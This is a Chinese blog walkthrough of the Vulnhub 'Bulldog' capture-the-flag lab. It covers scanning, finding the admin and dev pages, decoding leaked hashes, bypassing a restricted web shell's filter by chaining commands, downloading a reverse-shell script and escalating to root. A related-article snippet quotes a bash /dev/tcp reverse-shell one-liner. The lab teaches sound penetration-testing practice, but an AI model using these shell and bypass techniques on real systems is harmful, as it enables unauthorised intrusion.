bulldog靶机练习思路详解

最新推荐文章于 2024-06-03 20:06:58 发布
最新推荐文章于 2024-06-03 20:06:58 发布
阅读量316 收藏 2
点赞数
分类专栏: 网络攻防安全 渗透测试 文章标签: 渗透测试 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45597678/article/details/118612934
版权

下载靶机,在虚拟机中打开
下载地址:https://download.vulnhub.com/bulldog/bulldog.ova

主机扫描nmap,发现目标主机与其开放的端口
在这里插入图片描述

在浏览器打开网站,只发现一只傻不拉几的狗狗
在这里插入图片描述

使用burp进行爬虫发现网站下存在一个robots.txt
在这里插入图片描述

进行访问没有任何有用的信息
在这里插入图片描述
对网站进行目录扫描发现存在admin
在这里插入图片描述

浏览admin网页,打开了一个登录页面,但是没用做不了爆破
在这里插入图片描述

进入dev目录进行代码审计查看代码上是否用可用信息
在这里插入图片描述

发现一些加密之后的密码进行解码之后在前面的页面登录
在这里插入图片描述

进入webshell看到只能使用几条命令,但是这里可以使用命令组合绕过对其他命令的拦截
在这里插入图片描述

利用python打开我们的80端口服务搭建一个简易的网站
在这里插入图片描述

编写我们的shell反弹脚本
在这里插入图片描述

使用pwd&wget(使用命令组合可以绕过拦截)从我们主机的网站上将脚本下载下来
在这里插入图片描述

同样使用命令组合执行我们的脚本实现反弹shell
在这里插入图片描述
在这里插入图片描述

反弹shell之后我们成功进入了系统
在这里插入图片描述

对系统的文件进行查看ls -a可以查看隐藏文件
在这里插入图片描述

先使用cat命令查看发现出现乱码,想着换一种方式打开
在这里插入图片描述

使用strings可以避免乱码,打开文件之后发现一个地方可能是密码,而且最搞笑的是下面还有提示如何提升为root权限,sudo su root真的是见过的做简单的提权了吧,当然还有其他的提权方式如通过shell反弹这种方式的shell反弹具有root权限(这里的脚本和前面的反弹脚本一样不过在执行的时候需要加上root)。
在这里插入图片描述
在这里插入图片描述

反弹之后就变成了root权限
在这里插入图片描述

使用命令sudo su root再输入之前的django密码就可以切换为root用户了完成了提权
在这里插入图片描述
查看对应的flag文件
在这里插入图片描述

weixin_45597678
关注
专栏目录
vuInhub靶场实战系列-bulldog-1
06-03
vuInhub靶场实战系列-bulldog-1
渗透靶机BULLDOG
qq_43235703的博客
02-02 1166
靶机渗透之BULLDOG 渗透环境: 攻击机:kali(10.0.10.198) 靶机:vmbox(10.0.10.208) 连接模式:全部为桥接 探嗅目标 安装好我们的靶机之后开机,然后你的ip地址就出现在靶机界面上面,也省了我们用kali来扫 但是多少这达不到我们模拟实战的过程,真正的渗透谁会把地址摆着给你啊对不对,所以还是要动手用netdiscover来扫一波,直接扫出来然后上nmap扫端...
靶机渗透【bulldog
学信安技术 卫国家之门
11-04 4583
一. bulldog靶机安装 1. 下载bulldog 靶场地址:Bulldog - VulnHub (可自行下载) 百度网盘:bulldog 提取码:qrnf 2. 将下载好的靶机存放在想存放的地方,建议放在其他虚拟机相同的目录下 3. 打开VMware,左上角文件 - - 打开 - - 找到存放bulldog的位置 4. 开启bulldog(开启后无需进行其他操作) 二. bulldog靶机渗透 设备信息: kali(NAT)IP:192.168.110.140 bulldog(NAT)IP:
bulldog靶机
ybkj6666的博客
11-04 235
使用arp-scan生成网络接口地址,查看ip。
Bulldog靶机 学习总结 网络安全
Shelby12345的博客
01-31 935
发现了自己django,然后注意到有个id是bulldogadmin的很可疑,再系统中查找一下bulldogadmin所属的文件find / -user bulldogadmin 2>/dev/null(输入SUPERultimatePASSWORDyouCANTget,密码错误,又去找了找前辈的答案,发现H都是多余的,SUPERultimatePASSWORDyouCANTget。直接访问http://192.168.144.137/admin/ 发现需要登陆,F12看一下很干净,没藏东西。
bulldog1靶场渗透
b1n的博客
08-26 175
echo 'bash -i >& /dev/tcp/192.168.22.135/1234 0>&1' | bash #中间的ip是主机kali的地址,监听端口设置的啥就写啥。4、然后再去访问http://192.168.22.139/admin,用刚才的猜想用邮箱前的疑似用户名加上后面解密出的当做用户名和密码进行登录。5、再去访问http://192.168.22.139/dev/shell,发现可以成功访问,列出来的命令都可以执行。
BULLDOG-开源
05-27
【标题】"BULLDOG-开源"所涉及的知识点主要围绕着开源工作流解决方案Bulldog以及与其关联的J2EE容器和Tomcat展开。 首先,Bulldog作为一个开源项目,意味着它的源代码对公众开放,允许用户查看、使用、修改并分发...
bulldog_shop
05-09
自述文件 该自述文件通常会记录启动和运行应用程序所需的所有步骤。 您可能要讲的内容: Ruby版本 系统依赖 配置 数据库创建 数据库初始化 如何运行测试套件 服务(作业队列,缓存服务器,搜索引擎等) ...
British Bulldog Themes & New Tab-crx插件
03-16
安装扩展程序后,每次启动浏览器选项卡时,您将拥有一个新的British Bulldog。 我们的目标是为世界各地的人们带来出色的新标签。 让我们的团队为您提供新的屏幕标签,让您的生活栩栩如生。 每个新标签页都是真正的...
French Bulldog Themes & New Tab-crx插件
03-16
安装扩展程序后,每次启动浏览器选项卡时,您将拥有一个新的French Bulldog。 我们的目标是为世界各地的人们带来出色的新标签。 让我们的团队为您提供新的屏幕标签,让您的生活栩栩如生。 每个新标签页都是真正的...
渗透测试-vulnhub靶机 bulldog
2301_79441074的博客
11-23 68
命令执行漏洞
Vulnhub-Bulldog靶机实战
御七彩虹猫
03-24 1445
Vulnhub-Bulldog靶机实战
学习渗透日记4 靶机bulldog实战
qq_56902810的博客
04-26 222
bulldog靶机完整渗透版!
靶机实战-bulldog1
滕财然的博客
01-19 1034
bulldog1-靶机实战靶机实战:bulldog11、主机发现2、扫描端口3、web渗透(80端口)4、提权 靶机实战:bulldog1 先要知道对方的IP是否存活,也就是主机发现 1、主机发现 netdiscover -i etho -r IP/网段 属于主动 -i 指定网卡 -r 指定网段 找到目标靶机IP:192.168.232.134 也可以用nmap -sn 扫,看自己心情。...
bulldog靶机复现
2301_79118231的博客
11-14 216
注:个人笔记,有点简陋,仅供参考。准备:把kali和靶机设置为同一网段(NAT)
vuInhub靶场实战系列--bulldog-1
最新发布
weixin_45221204的博客
06-03 1311
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。本文介绍bulldog-1靶机渗透测试,内容包括主机扫描(nmap\netdiscover)、端口扫描(nmap\masscan)、目录扫描(dirb\dirsearch)MD5在线解码、netcat、反弹shell、linux内核提权等内容。😃使用nmap进行主机发现和端口扫描使用dirbsearch进行目录扫描MD5解密netcat监听反弹shell。
[渗透测试靶机10] vulnhub靶场 BULLDOG_ 1
weixin_47112073的博客
11-13 357
这个靶机难度较为简单,可以简单练手
【vulnhub】---bulldog靶机
qq_43168364的博客
08-21 363
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:bolldog靶机(192.168.1.105) 攻击机:kali Linux(192.168.1.104) 二、信息收集 主机发现 或者用netdiscover也可以。命令:netdiscover -i eth0 -r 192.168.1.0/24 端口扫描,首先用masscan看看它开启了哪些端口,他的速度过快时貌似发现不了某些端口,可以多扫描几次。 使用nmap进行版本探测
kali渗透综合靶机(二)--bulldog靶机
W小哥
03-07 1020
一、靶机下载 靶机下载地址:https://download.vulnhub.com/bulldog/bulldog.ova 二、bulldog靶机搭建 靶机: 将下载好的靶机环境,用VM VirtualBox导入即可使用,管理->导入虚拟电脑 设置网络模式,网卡选择仅主机模式 kali攻击机: 点开vmware中的虚拟选项编辑器中 点击更改设置,让vmware桥接至VirtualBox...
Python操作MySQL数据库:cursor游标详解渗透测试思路
文章提及的Vulnhub是一个提供漏洞环境的靶场平台,用于渗透测试练习。" 本文的重点在于Python与MySQL数据库的交互以及渗透测试的技巧。首先,Python提供了多种库来操作MySQL,如`pymysql`或`mysql-connector-python...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值